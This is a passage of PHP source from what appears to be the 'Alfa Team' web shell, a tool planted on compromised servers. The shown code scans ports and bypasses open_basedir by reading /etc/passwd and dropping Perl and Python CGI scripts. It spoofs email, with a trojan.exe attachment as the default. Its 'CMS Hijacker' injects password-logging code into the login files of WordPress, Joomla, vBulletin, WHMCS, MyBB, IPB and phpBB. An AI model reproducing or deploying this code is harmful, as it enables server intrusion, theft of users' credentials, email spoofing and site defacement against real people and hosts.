3645. if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
3646. else{ $packetContent = str_replace(array("\r","\n"), "", $packetContent);
3647. $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
3648. } for($i = $start;
3649. $i<=$end;
3650. $i++){ $sock = @fsockopen($host, $i, $errno, $errstr, 3);
3651. if($sock){ stream_set_timeout($sock, 5);
3652. fwrite($sock, $packetContent."\r\n\r\n\x00");
3653. $counter = 0;
3654. $maxtry = 1;
3655. $bin = "";
3656. do{ $line = fgets($sock, 1024);
3657. if(trim($line)=="")$counter++;
3658. $bin .= $line;
3659. }while($counter<$maxtry);
3660. fclose($sock);
3661. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
3662. echo "<p><textarea style='height:140px;
3663. width:50%;
3664. '>".$bin."</textarea></p></center>";
3665. } flush();
3666. } } echo '</div>';
3667. alfafooter();
3668. } function alfacgihtaccess($m,$d=''){ if($m=='cgi'){ $code = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
3669. }elseif($m=='sym'){ $code = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
3670. }elseif($m=='shtml'){ $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
3671. } @__write_file($d.'.htaccess',$code);
3672. } function alfabasedir(){ alfahead();
3673. echo '<div class=header>
3674. <center><p><div class="txtfont_header">| Open Base Dir |</div></p><h3><a href=javascript:void(0) onclick="g(\'basedir\',null,\'php\',null)">| php |</a><a href=javascript:void(0) onclick="g(\'basedir\',null,null,\'perl\')">| Perl |</a><a href=javascript:void(0) onclick="g(\'basedir\',null,null,null,\'py\')">| Python |</a></h3></center>';
3675. $pathBase=pathinfo(str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']));
3676. $direcTBase=pathinfo($pathBase['dirname']);
3677. if($_POST['alfa1'] == "php"){ AlfaNum();
3678. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
3679. set_time_limit(0);
3680. @$passwd = file('/etc/passwd');
3681. if(!is_array($passwd)){ $tmp=ALFA_TEMPDIR.'/passwd.txt';
3682. $p=pathinfo($GLOBALS['__file_path']);
3683. $tmp2=str_replace('\\','/',$p['dirname']).'/alfa_passwd.txt';
3684. $passwd = alfaEx('cat /etc/passwd >'.$tmp.';
3685. cat /etc/passwd >'.$tmp2);
3686. @$passwd = file($tmp);
3687. if(!is_array($passwd))@$passwd = file($tmp2);
3688. if(!is_array($passwd))die('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');
3689. } $pub = array();
3690. $users = array();
3691. foreach($passwd as $str){ $pos = strpos($str,':');
3692. $username = substr($str,0,$pos);
3693. $dirz = $direcTBase['dirname'].'/'.$username.'/'.$pathBase['basename'];
3694. if(($username != '')){ if (@is_readable($dirz)){ array_push($users,$username);
3695. array_push($pub,$dirz);
3696. }}} echo '<br><br>';
3697. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
3698. echo "<b><font color=\"#FFFFFF\">[+] Founded ".sizeof($pub)." readable ".$direcTBase['dirname'].'/*/'.$pathBase['basename']." directories\n"."<br /></font></b>";
3699. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
3700. foreach($users as $user){ $path = $direcTBase['dirname'].'/'.$user.'/'.$pathBase['basename'].'/';
3701. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");
3702. return false;
3703. '><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
3704. } echo '<br><br></b>';
3705. } if($_POST['alfa2'] && $_POST['alfa2'] == "perl"){ AlfaNum();
3706. @mkdir('cgialfa',0755);
3707. @chdir('cgialfa');
3708. alfacgihtaccess('cgi');
3709. @__write_file('basedir.alfa','#!/usr/bin/perl -I/usr/local/bandmain'."\n".'use CGI;
3710. print "Content-type: text/html\\n\\n";
3711. print "<html>";
3712. print "<title>Alfa Team~ OpenBaseDir with Perl</title>";
3713. print "<body bgcolor=\'black\'>";
3714. my $dirname = CGI::url_param("dirname");
3715. my $basename = CGI::url_param("basename");
3716. open my $passwd, "<", "/etc/passwd" or die "Can\'t open /etc/passwd: $!";
3717. my @allusers;
3718. my @readable_users;
3719. $i = 1;
3720. while (<$passwd>) {my ($user, undef, $id) = split /:/;
3721. chomp $user;
3722. if(-r $dirname."/".$user."/".$basename){push(@readable_users,$i++);
3723. }push(@allusers,$i++);
3724. }print("<center><b><font color=\\"yellow\\">[ Alfa Team~ OpenBaseDir with Perl ]</font></b><br><hr></center>");
3725. print("<b><font color=\\"#00A220\\">[+] Founded ".scalar(@allusers)." entrys in /etc/passwd</font></b><br />");
3726. print("<b><font color=\\"#FFFFFF\\">[+] Founded ".scalar(@readable_users)." readable ".$dirname."/*/".$basename." directories</font></b><br />");
3727. print("<b><font color=\\"#FF0000\\">[~] Searching for passwords in config files...</font></b><br /><br /><br />");
3728. open my $passwd, "<", "/etc/passwd" or die "Can\'t open /etc/passwd: $!";
3729. $b=1;
3730. while (<$passwd>) {my ($user, undef, $id) = split /:/;
3731. chomp $user;
3732. if(-r $dirname."/".$user."/".$basename){print "<div style=\'border: 1px solid green;
3733. \'><p><b><font color=\'yellow\'>".$b++." : ".$dirname."/".$user."/".$basename."</b><br>Use Command: dir<br>Result:<br></font><br><font color=\'red\'>";
3734. system("dir ".$dirname."/".$user."/".$basename);
3735. print("</font><p></div>")}}print "</body></html>";
3736. ');
3737. @chmod('basedir.alfa',0755);
3738. echo AlfaiFrameCreator('cgialfa/basedir.alfa?dirname='.urlencode($direcTBase['dirname']).'&basename='.urlencode($pathBase['basename']).'');
3739. } if($_POST['alfa3'] && $_POST['alfa3'] == "py"){ AlfaNum();
3740. @mkdir('cgialfa',0755);
3741. @chdir('cgialfa');
3742. alfacgihtaccess('cgi');
3743. @__write_file('basedirpy.alfa','#!/usr/bin/python'."\n".'try:'."\n".''."\t".'import cgitb;
3744. cgitb.enable()'."\n".'except:'."\n".''."\t".'pass'."\n".'import sys, cgi, os, commands'."\n".'form = cgi.FieldStorage() '."\n".'dirname = form.getvalue(\'dirname\')'."\n".'basename = form.getvalue(\'basename\')'."\n".'print "Content-type:text/html\\r\\n\\r\\n"'."\n".'print "<html>" '."\n".'print "<head>"'."\n".'print "<title>Alfa Team~ OpenBaseDir with Python</title>"'."\n".'print "</head>"'."\n".'print "<body bgcolor=\'black\'>"'."\n".'passwd = open("/etc/passwd","r")'."\n".'i = 0'."\n".'b = 0'."\n".'for line in passwd:'."\n".''."\t".'user = line.split(":")'."\n".''."\t".'if os.access(dirname+"/"+user[0]+"/"+basename, os.R_OK):'."\n".''."\t".''."\t".'i += 1'."\n".''."\t".'b += 1'."\n".'passwd.close()'."\n".'print "<center><b><font color=\'yellow\'>[ Alfa Team~ OpenBaseDir with Python ]</font></b><br><hr></center>"'."\n".'print "<font color=\'#00A220\'><b>[+] Founded ",b," entrys in /etc/passwd</b></font><br>"'."\t".''."\n".'print "<font color=\'#FFFFFF\'><b>[+] Founded ",i," readable "+dirname+"/*/"+basename+" directories</b></font><br>"'."\n".'print "<font color=\'#FF0000\'><b>[~] Searching for passwords in config files...</b></font><br><br><br>"'."\t".''."\n".'i = 1'."\n".'passwd = open("/etc/passwd","r")'."\n".'for line in passwd:'."\n".''."\t".'user = line.split(":")'."\n".''."\t".'if os.access(dirname+"/"+user[0]+"/"+basename, os.R_OK):'."\n".''."\t".''."\t".'print "<div style=\'border: 1px solid green;
3745. \'><p><font color=\'yellow\'><b>",i,": "+dirname+"/"+user[0]+"/"+basename+"</b><br>"'."\n".''."\t".''."\t".'print "Use Command: dir<br>Result:<br></font><br><font color=\'red\'>"'."\n".''."\t".''."\t".'print commands.getoutput("dir "+ dirname+"/"+user[0]+"/"+basename)'."\n".''."\t".''."\t".'print "</font></div>"'."\n".''."\t".''."\t".'i += 1'."\n".'passwd.close()'."\n".'print "</body>"'."\n".'print "</html>"');
3746. @chmod('basedirpy.alfa',0755);
3747. echo AlfaiFrameCreator('cgialfa/basedirpy.alfa?dirname='.urlencode($direcTBase['dirname']).'&basename='.urlencode($pathBase['basename']).'');
3748. } echo '</div>';
3749. alfafooter();
3750. } function alfamail(){ alfahead();
3751. echo '<div class=header>';
3752. AlfaNum(8,9,10);
3753. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value);
3754. return false;
3755. ">';
3756. $table = array( 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60') );
3757. create_table($table);
3758. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
3759. if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){ $mail_to = $_POST['alfa1'];
3760. $mail_from = $_POST['alfa2'];
3761. $mail_subject = $_POST['alfa3'];
3762. $mail_content = $_POST['alfa5'];
3763. $count_mail = (int)$_POST['alfa6'];
3764. $mail_attach = $_POST['alfa7'];
3765. if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){ if(!empty($mail_attach)&&@is_file($mail_attach)){ $file = $mail_attach;
3766. $content = __read_file($file);
3767. $content = chunk_split(__ZW5jb2Rlcg($content));
3768. $uid = md5(uniqid(time()));
3769. $filename = basename($file);
3770. $headers = "From: ".$mail_from." <".$mail_from.">\r\n";
3771. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
3772. $headers .= "Reply-To: ".$mail_from."\r\n";
3773. $headers .= "Content-Type: multipart/mixed;
3774. boundary=\"".$uid."\"\r\n\r\n";
3775. $headers .= 'MIME-Version: 1.0' . "\r\n";
3776. $headers .= 'X-Mailer: php' . "\r\n";
3777. $mail_content = "--".$uid."\r\n";
3778. $mail_content .= "Content-type:text/plain;
3779. charset=iso-8859-1\r\n";
3780. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
3781. $mail_content .= $mail_content."\r\n\r\n";
3782. $mail_content .= "--".$uid."\r\n";
3783. $mail_content .= "Content-Type: application/octet-stream;
3784. name=\"".$filename."\"\r\n";
3785. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
3786. $mail_content .= "Content-Disposition: attachment;
3787. filename=\"".$filename."\"\r\n\r\n";
3788. $mail_content .= $content."\r\n\r\n";
3789. $mail_content .= "--".$uid."--";
3790. }else{ $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
3791. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
3792. $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
3793. $headers .= 'Content-type: text/html;
3794. charset=utf-8' . "\r\n";
3795. $headers .= 'MIME-Version: 1.0' . "\r\n";
3796. $headers .= 'X-Mailer: php' . "\r\n";
3797. } if(empty($count_mail)||$count_mail<1)$count_mail=1;
3798. if(!empty($mail_from)){echo __pre();
3799. for($i=1;
3800. $i<=$count_mail;
3801. $i++){ if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
3802. }}else{__alert("Invalid Mail From !");
3803. } }else{__alert("Invalid Mail To !");
3804. } } echo('</div>');
3805. alfafooter();
3806. } function alfaziper(){ alfahead();
3807. AlfaNum(8,9,10);
3808. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
3809. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');
3810. return false;
3811. " method="post">
3812. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
3813. <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
3814. <input type="submit" value=" " name="ziper" />
3815. </form></center></p>';
3816. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){ $dirzip = $_POST['alfa3'];
3817. $zipfile = $_POST['alfa4'];
3818. if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||strlen(alfaEx("whoami"))==0)){ $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;
3819. }$zip=new ZipArchive();
3820. if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;
3821. }$source=str_replace(\'\\\\\',\'/\',realpath($source));
3822. if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
3823. foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);
3824. if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;
3825. $file=realpath($file);
3826. if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));
3827. }else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));
3828. }}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));
3829. }return $zip->close();
3830. ';
3831. $newfunc = create_function('$source,$destination', $code);
3832. if($newfunc($dirzip, $zipfile)){ echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
3833. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';
3834. } }else{ alfaEx("zip -r $zipfile $dirzip > /dev/null &");
3835. echo __pre().'<center><p>Please Wait For 1 min AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
3836. }} echo '</div>';
3837. alfafooter();
3838. } function alfacmshijacker(){ alfahead();
3839. AlfaNum(5,6,7,8,9,10);
3840. echo '<div class=header><br>
3841. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);
3842. return false;
3843. " method=\'post\'>
3844. <div class="txtfont">CMS: <select style="width:100px;
3845. " name="cmshi">';
3846. $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
3847. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
3848. echo("</select>");
3849. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
3850. SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
3851. <input type="submit" name="btn" value=" "></form></center><br>';
3852. $cms = $_POST['alfa1'];
3853. $saveto = $_POST['alfa2'];
3854. $cmspath = $_POST['alfa4'];
3855. if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){ echo __pre();
3856. alfaHijackCms($cms,$cmspath,$saveto);
3857. } echo '</div>';
3858. alfafooter();
3859. } function alfaHijackCms($cms,$cmspath,$saveto){ switch($cms){ case "vb": hijackvBulletin($cmspath,$saveto);
3860. break;
3861. case "wp": hijackwp($cmspath,$saveto);
3862. break;
3863. case "jom": hijackJoomla($cmspath,$saveto);
3864. break;
3865. case "whmcs": hijackWhmcs($cmspath,$saveto);
3866. break;
3867. case "mybb": hijackMybb($cmspath,$saveto);
3868. break;
3869. case "ipb": hijackIPB($cmspath,$saveto);
3870. break;
3871. case "phpbb": hijackPHPBB($cmspath,$saveto);
3872. break;
3873. default: echo "error!";
3874. break;
3875. } } function hijackvBulletin($path,$saveto){ $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);
3876. $alfa_password = $vbulletin->GPC["vb_login_password"];
3877. $alfa_file = "{saveto_path}";
3878. $sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");
3879. while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");
3880. @fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");
3881. @fclose($fp1);
3882. $f = @file($alfa_file);
3883. $new = array_unique($f);
3884. $fp = @fopen($alfa_file, "w");
3885. foreach($new as $values){@fputs($fp, $values);
3886. }@fclose($fp);
3887. }}';
3888. $clearpw = '$show[\'nopasswordempty\'] = defined(\'DISABLE_PASSWORD_CLEARING\') ? 1 : 0;
3889. ';
3890. $code=str_replace('{saveto_path}',$saveto,$code);
3891. $login = $path."/login.php";
3892. $class = $path."/includes/class_bootstrap.php";
3893. $dologin = 'do_login_redirect();
3894. ';
3895. $evil_login = "\t".$code."\n\t".$dologin;
3896. $evil_class = "\t\t//".$clearpw;
3897. if(is_file($login) AND is_writable($login) AND is_file($class) AND is_writable($class)){ $data_login = @file_get_contents($login);
3898. $data_class = @file_get_contents($class);
3899. if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){ $login_replace = str_replace($dologin,$evil_login, $data_login);
3900. $class_replace = str_replace($clearpw,$evil_class, $data_class);
3901. @file_put_contents($login, $login_replace);
3902. @file_put_contents($class, $class_replace);
3903. hijackOutput(0,$saveto);
3904. }else{ hijackOutput(1);
3905. } }else{ hijackOutput(1);
3906. } } function hijackwp($path,$saveto){ $code = '$alfa_file="{saveto_path}";
3907. $fp = fopen($alfa_file, "a+");
3908. fwrite($fp, $_POST[\'log\'].":".$_POST[\'pwd\']." (".($user->user_email).")\n");
3909. fclose($fp);
3910. $f = @file($alfa_file);
3911. $new = array_unique($f);
3912. $fp = @fopen($alfa_file, "w");
3913. foreach($new as $values){@fputs($fp, $values);
3914. }@fclose($fp);
3915. ';
3916. $redirect_wp = 'wp_safe_redirect($redirect_to);
3917. ';
3918. $code=str_replace('{saveto_path}',$saveto,$code);
3919. $login=$path."/wp-login.php";
3920. $evil_login = "\t".$code."\n\t".$redirect_wp;
3921. if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
3922. if(strstr($data_login, $redirect_wp)){ $login_replace = str_replace($redirect_wp,$evil_login, $data_login);
3923. @file_put_contents($login, $login_replace);
3924. hijackOutput(0,$saveto);
3925. }else{ hijackOutput(1);
3926. } }else{ hijackOutput(1);
3927. } } function hijackJoomla($path,$saveto){ $code = '<?php jimport(\'joomla.user.authentication\');
3928. $Alfa_auth = & JAuthentication::getInstance();
3929. $Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);
3930. $Alfa_options = array();
3931. $Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);
3932. if($Alfa_response->status == 1){$alfa_file="{saveto_path}";
3933. $fp=@fopen($alfa_file,"a+");
3934. @fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");
3935. @fclose($fp);
3936. $f = @file($alfa_file);
3937. $new = array_unique($f);
3938. $fp = @fopen($alfa_file, "w");
3939. foreach($new as $values){@fputs($fp, $values);
3940. }@fclose($fp);
3941. }?>';
3942. $code=str_replace('{saveto_path}',$saveto,$code);
3943. $comp=$path."/administrator/components/com_login/";
3944. if(is_file($comp."/login.php")){ $login = $comp."/login.php";
3945. }elseif(is_file($comp."/admin.login.php")){ $login = $comp."/admin.login.php";
3946. }else{ $login = '';
3947. } if(is_file($login) AND is_writable($login) AND $login != ''){ $data_login = @file_get_contents($login);
3948. $evil_login = $code."\n".$data_login;
3949. @file_put_contents($login, $evil_login);
3950. hijackOutput(0,$saveto);
3951. }else{ hijackOutput(1);
3952. } } function hijackWhmcs($path,$saveto){ $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";
3953. $alfa_uname = @$_POST[\'username\'];
3954. $alfa_pw = @$_POST[\'password\'];
3955. if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";
3956. $admin = true;
3957. }else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";
3958. $admin = false;
3959. }$alfa_query = mysqli_query($alfa_connect, $alfa_q);
3960. if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);
3961. $allow = true;
3962. if(!$admin){$__salt = explode(\':\', $row[\'password\']);
3963. $__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];
3964. if($row[\'password\'] == $__encPW){$allow = true;
3965. $row[\'username\'] = $row[\'email\'];
3966. }else{$allow = false;
3967. }}if($allow){$fp = @fopen($alfa_file, "a+");
3968. @fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");
3969. @fclose($fp);
3970. $f = @file($alfa_file);
3971. $new = array_unique($f);
3972. $fp = @fopen($alfa_file, "w");
3973. foreach($new as $values){@fwrite($fp, $values);
3974. }@fclose($fp);
3975. }}}}?>';
3976. $code=str_replace('{saveto_path}',$saveto,$code);
3977. $conf=$path."/configuration.php";
3978. if(is_file($conf) AND is_writable($conf)){ $data_conf = @file_get_contents($conf);
3979. if(!strstr($data_conf,'?>'))$code = '?>'.$code;
3980. $evil_conf = $data_conf."\n".$code;
3981. @file_put_contents($conf, $evil_conf);
3982. hijackOutput(0,$saveto);
3983. }else{ hijackOutput(1);
3984. } } function hijackMybb($path,$saveto){ $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");
3985. $alfa_fetch = $db->fetch_array($alfa_q);
3986. $alfa_file = "{saveto_path}";
3987. $fp = @fopen($alfa_file, "a+");
3988. @fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");
3989. @fclose($fp);
3990. $f = @file($alfa_file);
3991. $new = array_unique($f);
3992. $fp = @fopen($alfa_file, "w");
3993. foreach($new as $values){@fwrite($fp, $values);
3994. }@fclose($fp);
3995. ';
3996. $find = '$loginhandler->complete_login();
3997. ';
3998. $code=str_replace('{saveto_path}',$saveto,$code);
3999. $login=$path."/member.php";
4000. $evil_login = "\t".$code."\n\t".$find;
4001. if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
4002. if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
4003. @file_put_contents($login, $login_replace);
4004. hijackOutput(0,$saveto);
4005. }else{ hijackOutput(1);
4006. } }else{ hijackOutput(1);
4007. } } function hijackIPB($path,$saveto){ $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));
4008. $Alfa_file = "{saveto_path}";
4009. $fp = @fopen($Alfa_file, "a+");
4010. @fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");
4011. @fclose($fp);
4012. $f = @file($Alfa_file);
4013. $new = array_unique($f);
4014. $fp = @fopen($Alfa_file, "w");
4015. foreach($new as $values){@fputs($fp, $values);
4016. }@fclose($fp);
4017. ';
4018. $find = 'unset( $member[\'plainPassword\'] );
4019. ';
4020. $code=str_replace('{saveto_path}',$saveto,$code);
4021. $login=$path."/admin/sources/handlers/han_login.php";
4022. $evil_login = "\t".$find."\n\t".$code;
4023. if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
4024. if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
4025. @file_put_contents($login, $login_replace);
4026. hijackOutput(0,$saveto);
4027. }else{ hijackOutput(1);
4028. } }else{ hijackOutput(1);
4029. } } function hijackPHPBB($path,$saveto){ $code = '$Alfa_u = request_var(\'username\', \'\');
4030. $Alfa_p = request_var(\'password\', \'\');
4031. if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);
4032. if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";
4033. $fp = @fopen($Alfa_file, "a+");
4034. @fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");
4035. @fclose($fp);
4036. $f = @file($Alfa_file);
4037. $new = array_unique($f);
4038. $fp = @fopen($Alfa_file, "w");
4039. foreach($new as $values){@fputs($fp, $values);
4040. }@fclose($fp);
4041. }}';
4042. $find = 'case \'login\':';
4043. $code=str_replace('{saveto_path}',$saveto,$code);
4044. $login=$path."/ucp.php";
4045. $evil_login = "\t".$find."\n\t".$code;
4046. if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
4047. if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
4048. @file_put_contents($login, $login_replace);
4049. hijackOutput(0,$saveto);
4050. }else{ hijackOutput(1);
4051. } }else{ hijackOutput(1);
4052. } } function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');
4053. } function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){ if(@is_dir($dir)){ $files=@scandir($dir);
4054. foreach($files as $key => $value){ $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
4055. if(!@is_dir($path)){ if($ext!='*'){$f = basename($path);
4056. $f = explode('.',$f);
4057. $f = end($f);
4058. if($f!=$ext)continue;
4059. } if($e=='str'){ $content = @file_get_contents($path);
4060. if(strpos($content, $string) !== false){ echo str_replace('\\','/',$path) . "<br>";
4061. } }else{ if(strstr($value,$string)){ echo str_replace('\\','/',$path) . "<br>";
4062. } } $results[] = $path;
4063. }elseif($value != "." && $value != "..") { Alfa_StrSearcher($path,$string,$ext,$e,$results);
4064. $results[] = $path;
4065. }}}} function alfasearcher(){ alfahead();
4066. echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
4067. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){ echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');
4068. return false;
4069. " method=\'post\'>
4070. <div class="txtfont">
4071. Method: <select style="width: 18%;
4072. " onclick="alfa_searcher_tool(this.value);
4073. " name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
4074. Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
4075. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;
4076. " type="text" name="ext" size="5" value="php">
4077. <input type="submit" name="btn" value=" "></div></form></center><br>';
4078. $dir = $_POST['alfa2'];
4079. $ext = $_POST['alfa3'];
4080. $method = $_POST['alfa4'];
4081. if($_POST['alfa5']=='>>'){ echo __pre();
4082. if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
4083. Alfa_Searcher($dir,trim($ext),$method);
4084. } } if($_POST['alfa1']=='str'){ echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);
4085. return false;
4086. " method=\'post\'>
4087. <div class="txtfont">
4088. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
4089. String: <input type="text" name="string" value="">
4090. Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
4091. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;
4092. " type="text" name="ext" size="5" value="php">
4093. <input type="submit" name="btn" value=" "></div></form></center><br>';
4094. $dir = $_POST['alfa2'];
4095. $string = $_POST['alfa3'];
4096. $ext = $_POST['alfa5'];
4097. if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){ echo __pre();
4098. Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
4099. } } echo '</div>';
4100. alfafooter();
4101. } function alfaMassDefacer(){ alfahead();
4102. AlfaNum(5,6,7,8,9,10);
